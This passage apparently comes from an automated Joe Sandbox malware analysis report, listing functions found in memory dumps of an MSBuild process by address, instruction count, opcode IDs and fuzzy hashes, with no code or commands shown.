                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0145539D Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 91289a931c2a75ebfa5c2b5faa7e2741d62e929aab89369c1c1769c6db0f64bd
                                                                                                                                                                                                                                                                  • Instruction ID: 29d9bdb52454dccf42ad57905433cc7b5eeb51f9580b0f1ab823b85d27a77710
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91289a931c2a75ebfa5c2b5faa7e2741d62e929aab89369c1c1769c6db0f64bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0BE70A1024DAFDB04EBB8D451AAEB7B8EF18704F108059E906EB2A2EA74D9018B54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014552E2 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c91bfc30a0377518894d60d21707dfd0e6c50d3d446026352462e1486b3975fb
                                                                                                                                                                                                                                                                  • Instruction ID: e5cc481a7d2cd293fb7a61ead4baa7fff6b902a4811a562c58681e80981712c3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c91bfc30a0377518894d60d21707dfd0e6c50d3d446026352462e1486b3975fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F0E270A10249AFDB04EFB9E951EAEB7F8FF14704F008059A901EB3A2EA74D900CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01455283 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a39d692eab624fd11b6a6c98b35a08ec265d661be432ae626ca2721dd6d6af4a
                                                                                                                                                                                                                                                                  • Instruction ID: 1fc2d3171e009da28175e993f981e62e21cb26c531688464a7263b82525d7543
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a39d692eab624fd11b6a6c98b35a08ec265d661be432ae626ca2721dd6d6af4a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0E270A10209AFDB04EFB8D951EAEB7F8FF14704F008459B901EB391EA34D900CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BC5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e34731dea1716ccddfe598d8aaf91cfba4fe6e2f1da1c4aacf453f6a6825b623
                                                                                                                                                                                                                                                                  • Instruction ID: 6b2c5b9eb78de5e81bb01a37c943e93b1da9d32851678b7a3792b7e9397bdf0a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e34731dea1716ccddfe598d8aaf91cfba4fe6e2f1da1c4aacf453f6a6825b623
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07F0E2716116919FE732971CC1C8F917BD89F807BCF0CB466DA46C7D12E264E980CA50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014551CB Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: bb919459d63772024e022e36bb6f86063908c06539f0944a2ae69ace6375ff0f
                                                                                                                                                                                                                                                                  • Instruction ID: 85d282bd96ae45768f408703bf2e39917b1877000da927f6aaa8237e19633596
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb919459d63772024e022e36bb6f86063908c06539f0944a2ae69ace6375ff0f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93F082B0A10249ABDB04EBB8D955EAE77B8FF04708F040059B901EB2E1EA74E901CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013FD070 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                                                                                                                                  • Instruction ID: e055d838bfb28c0221337e37628e78756deae64e9e8ea9fe1e28c20b627b8999
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0E53350461467C230AA5D8C05F5BFBACDBE5B74F10031ABA249B2D0DA70A901D7D6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01455341 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 91bc6d2f4a7a7363e227d0fd912dbc8abbf0116d2eb4c18dc638472b5bcf4a19
                                                                                                                                                                                                                                                                  • Instruction ID: 4b2dd3da43421e1bfdbff7998e0a3384637551e782c02b0493396ac82cf53aff
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91bc6d2f4a7a7363e227d0fd912dbc8abbf0116d2eb4c18dc638472b5bcf4a19
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0A770A14249ABDF04DBBDD955EAE77F8EF19704F504059E902EB3E1EA74DD008714
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B7208 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7f897501ab69f5bccdbcaa34f24b5975126ca917219eac003c8fa7594e9b256f
                                                                                                                                                                                                                                                                  • Instruction ID: dca04f55c9a3aefdc310fc45bfa09713b39cd19e7ff92904131c74500a81dee7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f897501ab69f5bccdbcaa34f24b5975126ca917219eac003c8fa7594e9b256f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F0EC71911685EFEB23E31ED098F2377D89B00A3CF098069DA0D8BE22D328C880C250
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01455227 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: bc7fcf88d4d009bd4903ceb71aa74310aed755d540d9a4549ef407c84f4638a3
                                                                                                                                                                                                                                                                  • Instruction ID: 031d93e89d0e77ee6137ec94a2341d26b807cd4e75e31e2b80c7b945bcc2b173
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc7fcf88d4d009bd4903ceb71aa74310aed755d540d9a4549ef407c84f4638a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F08270A14249ABDB14EBB8D955EAE77B8EF14704F044059B901EF291EA74D901C754
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0145547F Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 57a5446f5edf1e2e6aae2174f4b23c071d05171ed8baaf37c9f47ba838b1b84c
                                                                                                                                                                                                                                                                  • Instruction ID: f2c22f17d5236747d020ea506a3a50ca4c7e528dfa9cb79a29b34032961cb6ad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57a5446f5edf1e2e6aae2174f4b23c071d05171ed8baaf37c9f47ba838b1b84c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F08270A01249ABDF04DBB9D955F9E7BB8EF09704F104069EA01EB391EA34DD018754
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B55C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                                                                                                                                  • Instruction ID: 7607b11f823bea95a889758c5cd94bf5ce6f99db5efcb7b4b4ba5a58b6d2562c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9E0E533140618ABC7211A1AD800F53BB69FF60BB5F10411AA259979D09B60AC11CAD4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013825E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6d1ee891f87bd90c0c193b1253e8b5fbfb2586421ea180400f2a11f265373994
                                                                                                                                                                                                                                                                  • Instruction ID: 51c34358b4230fb41004e28e65a3ca7d6fa3a6997e5c914a20b56028079061c8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d1ee891f87bd90c0c193b1253e8b5fbfb2586421ea180400f2a11f265373994
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64E09272100A949BC721BB2DDD01F8B7B9AEB60768F014519B119571A0CA34AD10C7C4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01404000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                                                  • Instruction ID: f90a1c2451b6ecab3bb3086e1d5d9332b5d412cc8e6b48bfcc02ab07f9167fe3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E0AE743002068BE716CF1AC040B627BA6BFD5A10F28C079AA488F345EB32A8428A40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143B3D0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                                                                                                                                  • Instruction ID: 47a3adb0835d7c5814e86fcb35422f2586b0e4aecf87b8ee299e085ed32c1bc6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12E0CD31244515B7DF221A54CC00F657715DB94794F104032FA085A661C5759D51D6D4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                                                  • Instruction ID: bffade9e2fabd9a90f3a054098e6011aa855f8fb9b8479f7154d7a93eed2dd40
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50E0C232100A14EFDF322F2ADC04F5276A5FF54F19F11486DE08A068A48B78AC81CB44
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01382050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 26cfe5fcf2d6724e6cb209972405cfe784b18701cb54f2685e88796920a87628
                                                                                                                                                                                                                                                                  • Instruction ID: d18dd3e02a8009331ad1eaa1f6f105ed2d6247b0e7da6628a6e5cb2270ec934d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26cfe5fcf2d6724e6cb209972405cfe784b18701cb54f2685e88796920a87628
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEE0C232100A90ABC721FB6DDD00F4A779EEFA4274F010121F554876A0CA64AD00C7D4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014092BC Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d32dac41f4004017abff4281170335c59ccc3e3e33f12beee589c0de84c8bf97
                                                                                                                                                                                                                                                                  • Instruction ID: a8ca81f5b49ee5377d15086087a6d33325aef1cc3b26ff88bd9b814687ecc4a0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d32dac41f4004017abff4281170335c59ccc3e3e33f12beee589c0de84c8bf97
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2F0C234251B80CBE62ADF09C1A1B5277B9FB89B44F500469D44A8BBB2C73AA942CF40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00416CCF Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f06ff5adcb6616e5d173e7566f21a026330a18a3d47000009d25f765a66bdc14
                                                                                                                                                                                                                                                                  • Instruction ID: a773bce62f62b26f42a47ce71cc50c34edd637c81d640a9897753b8dd1946e03
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f06ff5adcb6616e5d173e7566f21a026330a18a3d47000009d25f765a66bdc14
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BD02233B062A40A8123093ABC010B2FF60C58B128B2622E3EC04E7401D213C05A82CA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137B562 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                                                                                                                  • Instruction ID: 08ef495d482fe7d208efa5ea5fb8cb2cf6a9a786526d38c1e38208439c5b5e0a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7D02B31020650EFDB312F29ED00F827E71AF90B14F0400187101164F08574DC40C690
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BE59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                                                  • Instruction ID: 4ffb841419b706c2b80219a673b93f24115cf8b86e26d7cb4f411da276fb38ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77D0A932204A60ABEB32AA2CFC00FC333E8BB88728F060459B008C7051C360AC81CA84
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                                                  • Instruction ID: 7d256696ca37d6db8925aafbc9ce69a12184bdfc30dcf9457e9648a25a04a0da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08D0123221747597EF39566A6914F6B7919AB81A98F1E006D750AD3900C5198C43D6E0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013902A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
